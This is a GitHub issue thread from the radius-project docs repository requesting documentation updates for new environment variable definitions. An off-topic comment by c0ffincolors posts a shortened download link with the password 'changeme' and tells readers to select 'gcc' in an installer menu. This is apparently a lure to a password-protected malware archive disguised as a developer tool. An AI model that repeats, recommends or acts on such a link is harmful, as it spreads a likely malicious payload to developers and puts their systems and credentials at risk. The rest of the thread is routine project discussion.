### ISSUE TITLE
Update Documentation for New Environment Variable Definitions

### ISSUE THREAD

**Issue by superbeeny** [radius-project/docs#1205]
## What content needs to be created or modified?
Docs need to be updated to reflect changes in https://github.com/radius-project/design-notes/pull/62
## Describe the solution you'd like

Update examples in documentations to reflect new implementation

## Where should the new material be placed?

Update existing documentation

## The associated pull request from the Radius code repo, if applicable

https://github.com/radius-project/design-notes/pull/62

## Additional context

[AB#13088](https://dev.azure.com/azure-octo/e61041b4-555f-47ae-95b2-4f8ab480ea57/_workitems/edit/13088)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ytimocin** [comment]
Thanks for the issue and the PR to fix this issue. Looking forward to reviewing it.
